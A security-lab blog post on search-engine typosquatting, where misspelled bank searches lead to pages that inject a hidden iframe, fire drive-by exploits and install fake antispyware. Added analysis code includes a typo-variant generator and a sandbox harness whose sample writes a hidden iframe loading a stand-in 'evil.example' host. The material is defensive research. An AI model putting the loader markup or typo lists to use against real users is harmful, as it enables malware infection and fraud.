Blog
MOTW: Search Engine Typosquatting
10.09.2006 - 12:13 PM
This lure relies on the likelihood that a user will make a typo while entering a term into a search engine. There is an endless number of possible typographical errors for any given term, but with a few simple algorithms (neighbouring-key substitutions, skipped, doubled and transposed letters) and some statistics on how often each one occurs, you can narrow the list down to a manageable set. Attackers have been doing this for years and have become very good at predicting the most common typos for each keyword.
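The candidate-generation step described above, as an added example (this is not code from the original post or from Websense Security Labs). It enumerates the typo classes an attacker would register or optimise for, using an approximate QWERTY adjacency map; the ordering by typo class is a stand-in for the frequency statistics a real campaign would use, and the keyword "banca" is only a sample input.

```javascript
// Added example: enumerate likely typos of a search keyword.
// Approximate QWERTY layout; row offsets are ignored, so "adjacent" is
// the same column plus or minus one in the rows above and below.
const QWERTY_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"];

function buildAdjacency(rows) {
  const adj = {};
  rows.forEach((row, r) => {
    [...row].forEach((ch, c) => {
      const near = new Set();
      for (let dr = -1; dr <= 1; dr++) {
        const other = rows[r + dr];
        if (!other) continue;
        for (let dc = -1; dc <= 1; dc++) {
          const n = other[c + dc];
          if (n && n !== ch) near.add(n);
        }
      }
      adj[ch] = [...near];
    });
  });
  return adj;
}
const ADJACENT = buildAdjacency(QWERTY_ROWS);

// Returns [{ variant, kind }] for every single-error typo of `word`,
// de-duplicated, with the original word itself excluded.
function typoCandidates(word) {
  const w = word.toLowerCase();
  const seen = new Map(); // variant -> kind (first kind to produce it wins)
  const add = (v, kind) => {
    if (v.length > 0 && v !== w && !seen.has(v)) seen.set(v, kind);
  };
  for (let i = 0; i < w.length; i++) {
    const neighbours = ADJACENT[w[i]] || [];
    // 1. Fat finger: a neighbouring key pressed instead of the right one ("banxa").
    for (const n of neighbours) add(w.slice(0, i) + n + w.slice(i + 1), "adjacent");
    // 2. Skipped letter.
    add(w.slice(0, i) + w.slice(i + 1), "omission");
    // 3. Doubled letter.
    add(w.slice(0, i + 1) + w[i] + w.slice(i + 1), "repeat");
    // 4. Two neighbouring letters swapped.
    if (i + 1 < w.length) add(w.slice(0, i) + w[i + 1] + w[i] + w.slice(i + 2), "transposition");
    // 5. A neighbouring key hit together with the right one.
    for (const n of neighbours) add(w.slice(0, i + 1) + n + w.slice(i + 1), "insertion");
  }
  // Static priority of typo classes; a real campaign would replace this
  // with observed typo frequencies for the keyword (assumption, not data).
  const order = { adjacent: 0, transposition: 1, omission: 2, repeat: 3, insertion: 4 };
  return [...seen]
    .map(([variant, kind]) => ({ variant, kind }))
    .sort((a, b) => order[a.kind] - order[b.kind] || a.variant.localeCompare(b.variant));
}

// Sample run on a constructed keyword: prints the highest-priority variants.
console.log(typoCandidates("banca").slice(0, 10));
```

Run it with `node` and compare the "adjacent" list against what you actually type when you hurry: the misspelling in this post, "banxa", falls out of class 1 at position four. The same generator works defensively, for instance to check whether the typo variants of your own brand are registered as domains or show up in search results.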
To give you an example of how this attack works, I'm going to hit the "x" key instead of the "c" key (a surprisingly common typo, since the two keys sit side by side) while searching Google for the name of my bank. This ends up spelling "banxa" instead of "banca" ("banca" is Italian for "bank"). Even though this typo has created a meaningless word, we still get plenty of results from Google:
Warning: Visiting any of the sites mentioned in this article can and likely will compromise your computer. Please do not visit these sites.
[Screenshot: Google results for the misspelled term]
Note: The name of the bank has been removed from this screenshot.
The first result looks suspicious enough; I'll begin my research there. One block of JavaScript stands out while looking over the page's HTML source.
[Screenshot: obfuscated JavaScript block from the page source]
I don’t know what this big block of ugliness does just yet, but something tells me that it isn’t very friendly. Using some of the techniques discussed in our last Malcode of the Week, we quickly de-obfuscate this script back into plain text. Here’s what that block of script actually creates in your browser:
[Screenshot: the HTML the de-obfuscated script writes into the page]
Bad news: a hidden iframe. Following the URL loaded by this iframe, I arrive at a myriad of exploits and drive-by download attempts. At this point I'm pretty confident that this page is up to no good, but no blog would be complete without screenshots of a workstation being compromised. So, I'm going to visit this page from a protected lab environment and see what it looks like from a victim's perspective.
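One way to see what such a script "actually creates in your browser" without letting it touch a real page, as an added example that is neither the script from the compromised site nor the de-obfuscation technique from the earlier Malcode of the Week post: run the script text against a stub `document` that only records what gets written, then inspect the captured HTML for iframes a user could never see. The obfuscated sample (a `document.write` hidden behind `String.fromCharCode`) and the URL `evil.example` are constructed for this example.

```javascript
// Added example: capture document.write() output from an obfuscated script
// and flag hidden iframes in it. Run only on an isolated analysis machine:
// new Function() really executes the script, it just gets a fake document.

// Constructed sample, not the script from the compromised page.
const HIDDEN_IFRAME_HTML =
  '<iframe src="http://evil.example/loader" width="0" height="0" style="display:none"></iframe>';
const OBFUSCATED_SCRIPT =
  "document.write(String.fromCharCode(" +
  [...HIDDEN_IFRAME_HTML].map((c) => c.charCodeAt(0)).join(",") +
  "));";

// Execute the script with a stand-in `document`/`window` and return
// everything it tried to write into the page.
function captureWrites(scriptText) {
  const writes = [];
  const fakeDocument = {
    write: (html) => writes.push(String(html)),
    writeln: (html) => writes.push(String(html) + "\n"),
  };
  const fakeWindow = { location: { href: "about:blank" } };
  const run = new Function("document", "window", scriptText);
  run(fakeDocument, fakeWindow);
  return writes.join("");
}

// Report iframes that are zero-sized or hidden through inline CSS.
function findHiddenIframes(html) {
  const found = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const attr = (name) => {
      const r = new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]*)`, "i").exec(attrs);
      return r ? r[1] : null;
    };
    const zeroSized = ["width", "height"].some((a) => /^0(px)?$/i.test(attr(a) || ""));
    const cssHidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs);
    if (zeroSized || cssHidden) found.push({ src: attr("src"), zeroSized, cssHidden });
  }
  return found;
}

// Full pipeline: obfuscated script text in, list of hidden iframes out.
function analyse(scriptText) {
  return findHiddenIframes(captureWrites(scriptText));
}

console.log(analyse(OBFUSCATED_SCRIPT));
```

Real samples of this era usually chain several layers (`eval`, `unescape`, string reversal) and read `navigator` or `location` before deciding what to write, so expect to extend the stub objects as a sample probes them; the captured `src` is the next URL to follow, in the lab, the way the post does.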
Repeating the same Google search and visiting the first result in our browser, I end up being greeted with a blank page prompting me to accept an ActiveX control. This page actually attempts numerous exploits (including the recent VML vulnerability) before resorting to the prompt. If this workstation had not been patched recently, it would have been compromised silently, without the prompt. I'm in a cooperative mood, so I'll answer "Yes" to the ActiveX prompt.
[Screenshot: ActiveX control prompt on the blank page]
Within seconds of accepting, my browser is closed automatically and my background is changed. I then see a dialog box warning that Spyware has been detected on my system. How thoughtful -- the bad stuff I just installed is letting me know I have bad stuff installed.
This is a familiar type of malware that we have run into many times in the past. It takes the workstation hostage and attempts to convince the owner to purchase multiple bogus "Spyware Remover" applications at ~$50 each.
[Screenshot: changed desktop background and fake "Spyware detected" dialog]
The same investigation was repeated on the top ten Google results for this term, and every link in the top ten contained some type of malicious code. Nearly identical results are found when repeating the experiment with other major Italian banks and with typos of "bank" and "financial". The problem isn't limited to financial sites, either: misspell nearly any search term and you are almost guaranteed to end up at a questionable site.
Conclusion
Someone out there is always trying to get you to visit their website and sometimes the simplest tricks work wonders. The next time you are making a search on the Internet, take an extra second to make sure you got the results you expected before you start following links. One letter can mean the difference between arriving at your online banking site or ending up with a desktop of Spyware.
Researcher: Patrick Comiotto, Websense Security Labs